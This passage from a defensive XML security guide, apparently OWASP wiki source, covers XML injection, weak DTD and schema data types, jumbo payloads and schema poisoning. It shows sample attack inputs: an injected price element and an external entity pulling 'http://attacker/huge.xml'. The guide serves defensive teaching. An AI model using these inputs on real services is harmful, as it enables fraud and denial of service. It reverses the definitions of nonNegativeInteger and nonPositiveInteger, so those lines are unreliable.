  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
